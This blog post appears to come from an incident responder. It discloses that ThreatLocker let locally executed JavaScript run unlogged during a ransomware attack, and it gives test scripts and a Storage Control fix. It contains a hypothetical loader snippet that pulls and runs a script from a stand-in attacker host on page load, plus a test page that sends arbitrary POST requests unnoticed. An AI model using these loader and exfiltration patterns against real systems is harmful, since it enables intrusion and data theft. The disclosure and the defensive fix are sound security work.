
Exposing a Critical Flaw in ThreatLocker’s Zero Trust Model

A ransomware response led me to expose a critical flaw hiding in plain sight inside ThreatLocker’s Zero Trust software.

A Bit of Background

For those unfamiliar, ThreatLocker is a zero-trust security platform that allows organizations to define exactly what software and scripts can execute on their systems. By default, everything is denied unless explicitly allowed, making it a popular choice for businesses seeking tighter control over their endpoints.

The platform includes tools for application whitelisting, ringfencing, storage control, and elevation control. In theory, this should drastically reduce the risk of malware or unauthorized code running on protected machines. But as I discovered during a real-world ransomware incident, there’s a critical flaw that puts their customers at risk.

A Vulnerability Waiting To Be Exposed

When responding to a recent ransomware attack, I stumbled upon a serious oversight in ThreatLocker’s security model—one that could severely compromise its entire zero-trust framework. While ThreatLocker is designed to lock down nearly all executable actions on a system, it shockingly overlooks a major attack vector: locally executed JavaScript (or .js) files.

At first, I thought this vulnerability was limited to directories like the user’s desktop and documents folder due to default storage control policies. But as I continued testing, I realized something far worse—JavaScript execution was approved in every directory I tested, regardless of system-wide security policies.

This means that a properly crafted JavaScript file can execute without any restrictions, enabling file enumeration, outbound API calls, and external webhooks—all without interference from ThreatLocker’s software. Worst of all, even with ThreatLocker in “safe mode,” outbound HTTP requests went completely undetected and did not show up in audit logs. Given my limited JavaScript experience, I can only imagine what a more skilled attacker could achieve.

What makes this even more baffling is that other scripting languages—like Python, Batch, and PowerShell—are correctly blocked by ThreatLocker by default. The fact that JavaScript is the exception, despite its versatility and potential for abuse, raises serious questions about the consistency of their threat modeling.

To be fair, it’s somewhat understandable that JavaScript may be more loosely handled due to its use by Windows system components and third-party applications. However, considering how aggressively ThreatLocker blocks other scripting languages, you’d expect JavaScript-based files to be whitelisted during “learning mode” or explicitly managed via built-in policies. That simply isn’t the case here.

Real-World Consequences

The implications of this flaw aren’t just theoretical. The ransomware attack I responded to exploited this exact weakness.

The attacker managed to spoof WhatsApp with a locally downloaded HTML file, which contained JavaScript that downloaded additional malicious scripts. This malware began encrypting files inside the user’s documents folder, and I was only alerted because Todyl’s SGN agent flagged the unusual file encryption activity.
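
To be clear, I’m not reproducing the attacker’s actual payload here, but the loader pattern itself is trivial: a few lines of JavaScript inside a locally opened HTML file are enough to pull down and run additional code from a remote server. The sketch below is a hypothetical illustration only, and "attacker.example" is a placeholder, not the real infrastructure from the incident.

// Hypothetical second-stage loader inside a locally opened HTML page.
// The URL is a placeholder; in a real attack it would point at attacker-controlled infrastructure.
const loader = document.createElement("script");
loader.src = "https://attacker.example/stage2.js"; // downloaded and executed as soon as it loads
document.head.appendChild(loader);

Because the page is opened straight from disk and the loader runs on page load, the victim never has to visit a malicious website; the remote script is fetched and executed the moment the local file is opened.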

Even more damning—ThreatLocker approved every malicious action. When reviewing its unified audit logs, there was no indication that anything suspicious had occurred. The software, which was supposed to provide a “zero trust” security layer, completely failed to recognize and block this attack method.

The Evidence

To back up everything I’ve described so far, here’s direct evidence from ThreatLocker’s Unified Audit logs. This screenshot demonstrates how a .html file executed a local .js script on a fully locked-down system without being blocked or logged—even with Storage Control, Application Control, and Ringfencing in place. If you don’t believe me, use the scripts below to try it yourself.

The threatlocker test.html file is a simple web interface I threw together to load a local JavaScript file and exercise a few functions. I am no JavaScript developer, so the tests are simple in nature, but none of these script executions appear in the Unified Audit logs.

Here are the scripts that I used to create this test:

threatlocker test.html

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>API & File System Access Example</title>
  <!-- Load the external JavaScript file -->
  <script src="script.js" defer></script>
</head>
<body>
  <h1>Time Checker</h1>
  <button onclick="checkTime()">Check Time</button>
  <p id="timeDisplay"></p>

  <hr>

  <h2>List Files in a Directory</h2>
  <!-- Button to trigger directory selection -->
  <button onclick="listFiles()">Select Directory & List Files</button>
  <div id="fileList"></div>

  <hr>

  <h2>Test Web API Call / Webhook</h2>
  <!-- Form to enter the API URL and payload -->
  <form id="apiForm">
    <label for="apiUrl">API/Webhook URL:</label>
    <input type="url" id="apiUrl" name="apiUrl" required placeholder="https://example.com/webhook">
    <br><br>
    <label for="payload">Payload (JSON):</label>
    <br>
    <textarea id="payload" name="payload" rows="4" cols="50" placeholder='{"key": "value"}'></textarea>
    <br><br>
    <button type="submit">Send POST Request</button>
  </form>
  <div id="apiResponse"></div>
</body>
</html>

script.js

// Function to display the current time
function checkTime() {
  const now = new Date();
  const currentTime = now.toLocaleTimeString();
  document.getElementById("timeDisplay").textContent = "Current time: " + currentTime;
}

// Function to list files in a user-selected directory using the File System Access API
async function listFiles() {
  if ('showDirectoryPicker' in window) {
    try {
      // Prompt the user to select a directory
      const dirHandle = await window.showDirectoryPicker();
      const fileNames = [];
      // Iterate over entries in the directory
      for await (const entry of dirHandle.values()) {
        if (entry.kind === 'file') {
          fileNames.push(entry.name);
        }
      }
      // Display the file names or a message if no files are found
      document.getElementById("fileList").innerHTML = 
        fileNames.length > 0 ? fileNames.join("<br>") : "No files found in the selected directory.";
    } catch (err) {
      console.error("Directory access cancelled or failed:", err);
      document.getElementById("fileList").textContent = "Error accessing directory or action cancelled.";
    }
  } else {
    document.getElementById("fileList").textContent = "Your browser does not support the File System Access API.";
  }
}

// Event listener for the API/Webhook test form submission
document.getElementById("apiForm").addEventListener("submit", async function(e) {
  e.preventDefault(); // Prevent form from submitting in the default way

  const apiUrl = document.getElementById("apiUrl").value;
  let payload;
  
  // Parse the payload as JSON. Use an empty object if no payload is provided.
  try {
    const payloadText = document.getElementById("payload").value.trim();
    payload = payloadText ? JSON.parse(payloadText) : {};
  } catch (error) {
    document.getElementById("apiResponse").textContent = "Invalid JSON in payload.";
    return;
  }

  try {
    // Send a POST request to the specified URL with the JSON payload
    const response = await fetch(apiUrl, {
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify(payload)
    });
    
    // Read the response body once as text, then try to pretty-print it as JSON.
    // (Calling response.json() first and falling back to response.text() would
    // fail with a "body stream already read" error on non-JSON responses.)
    let responseData = await response.text();
    try {
      responseData = JSON.stringify(JSON.parse(responseData), null, 2);
    } catch {
      // Not valid JSON; keep the raw text.
    }
    
    document.getElementById("apiResponse").innerHTML = `<pre>${responseData}</pre>`;
  } catch (err) {
    console.error("Error sending request:", err);
    document.getElementById("apiResponse").textContent = "Error sending request: " + err;
  }
});

In my opinion, the most terrifying aspect of this vulnerability isn’t just that JavaScript files can run in general, but that ThreatLocker provides zero visibility or logging for what these scripts do once they execute.

During my testing, I confirmed that I could send POST requests to any webhook or API endpoint on the internet, completely unnoticed. No alerts. No logs. No evidence in ThreatLocker’s Unified Audit that the action ever occurred.

This completely defeats the purpose of a zero-trust solution, which should provide visibility, accountability, and control over all application executions, script behavior, and outbound network activity.

ThreatLocker’s Dismissive Response

I immediately contacted ThreatLocker’s support team, expecting a swift response given the severity of this issue. Instead, their technicians seemed shocked by my findings but offered little to no assistance. They failed to escalate the issue internally, and as of March 30th, 2025, the vulnerability remains fully exploitable. This dismissive attitude raises serious concerns.

I was ultimately able to implement a working fix, but not through any direct guidance from their team; I will outline this fix below. Their support offered a solution that did not work in practice, and I had to resolve the issue entirely on my own through custom rules and trial-and-error. That kind of hands-off response is unacceptable when dealing with enterprise-level security software.

The Fix

In this section, I will outline the fix I found to be effective and implemented on all our client tenants.

First, I needed to determine whether Windows itself or third-party applications rely on .js files in ways that would make outright blocking problematic. Using Search Everything, I scanned a variety of workstation and server environments to get a complete picture. What I found was encouraging: while JavaScript files are in use, they’re typically limited to a small number of known directories.
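
If you’d rather script that survey than click through Search Everything, the sketch below does roughly the same thing. It’s a minimal Node.js script (a hypothetical inventory-js.js, assuming Node is available on the machine you’re auditing) that walks a drive and prints every directory containing .js files:

inventory-js.js

// Minimal sketch: list every directory under the given root that contains .js files.
// Usage: node inventory-js.js C:\
const fs = require("fs");
const path = require("path");

const root = process.argv[2] || "C:\\";
const dirsWithJs = new Set();

function walk(dir) {
  let entries;
  try {
    entries = fs.readdirSync(dir, { withFileTypes: true });
  } catch {
    return; // skip directories we can't read (permissions, locked system paths, etc.)
  }
  for (const entry of entries) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      walk(full);
    } else if (entry.isFile() && entry.name.toLowerCase().endsWith(".js")) {
      dirsWithJs.add(dir);
    }
  }
}

walk(root);
[...dirsWithJs].sort().forEach((dir) => console.log(dir));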

Perfect. That meant we could safely block JavaScript files globally and simply whitelist the required system and third-party app directories. To achieve this, I created two separate policies in ThreatLocker’s Storage Control module:

  1. A deny policy to block all .js and .js.* file types.
  2. An allow policy to whitelist known safe paths where JavaScript files are legitimately used.

While implementing these, I quickly ran into an annoying limitation of ThreatLocker’s policies: all whitelisted file paths in a policy are restricted to 980 characters total. That meant I couldn’t simply dump all known safe paths into one policy. Instead, I had to get clever with wildcards to cover as many safe use cases as possible while keeping the path list minimal. After sorting through thousands of entries, I narrowed it down to the following set:

C:\Program Files*\*\*.js  
C:\Program Files*\*\*.js.*  
C:\Users\*\AppData\*\*.js  
C:\Users\*\AppData\*\*.js.*  
C:\Users\*\.vscode\*\*.js  
C:\Users\*\.vscode\*\*.js.*  
C:\Windows\*\*.js  
C:\Windows\*\*.js.*  
C:\xampp\*\*.js  
C:\xampp\*\*.js.*

Below is a series of screenshots showing the policy details and how they’re structured. While I could not easily capture the entire column, I have included pictures of the top and bottom of each policy, ordered Allow Policy first and then Deny Policy. The image above shows the order in which I have placed these policies.

Once these were in place, I ran the new configuration through a week of live testing across several environments, including standard Windows 10 and 11 machines, domain controllers, terminal servers, and file servers. After extensive auditing, I was satisfied that the policies didn’t introduce any new issues and rolled them out globally.

Since implementing this fix, I’ve only seen one false positive: QuickBooks Pro 2022 required a JavaScript file within a user’s Documents folder. That was easily resolved by adding a single path exception for that client.

Important: While this fix works in our environment, I strongly recommend testing it in your own setup before applying it broadly. If you encounter edge cases or make improvements, please drop them in the comments. I’ll update the guide (and my own policies) accordingly.
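
One quick way to spot-check the deny policy is a harmless canary script; the file below (a hypothetical canary.js, nothing to do with ThreatLocker itself) does nothing but report where it ran. Drop it into a user’s Documents folder and double-click it. If the Storage Control policies behave as expected, the execution should be blocked and the attempt should show up in the Unified Audit; if a message box appears instead, .js files are still running unrestricted.

canary.js

// Harmless canary: does nothing except announce its own path.
// Double-clicking a .js file on Windows runs it via wscript.exe (Windows Script Host).
WScript.Echo("JavaScript executed from: " + WScript.ScriptFullName);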

The Bigger Picture

ThreatLocker isn’t the only zero-trust solution on the market, but this incident casts doubt on the entire concept of zero-trust security. If a security solution claims to prevent unauthorized execution yet overlooks something as basic as locally executed JavaScript, what else is being ignored?

For security-conscious businesses, this is a wake-up call. Do not blindly trust security vendors. Conduct independent testing, review outbound network activity, and assume that every system has weaknesses—because they do.

Until ThreatLocker addresses this issue, businesses relying on it for security are at serious risk. This vulnerability is not a theoretical exploit; it has already been used in an active ransomware attack.

If ThreatLocker truly values security, they need to act now. Until then, I advise businesses to reconsider their reliance on ThreatLocker as a security solution.
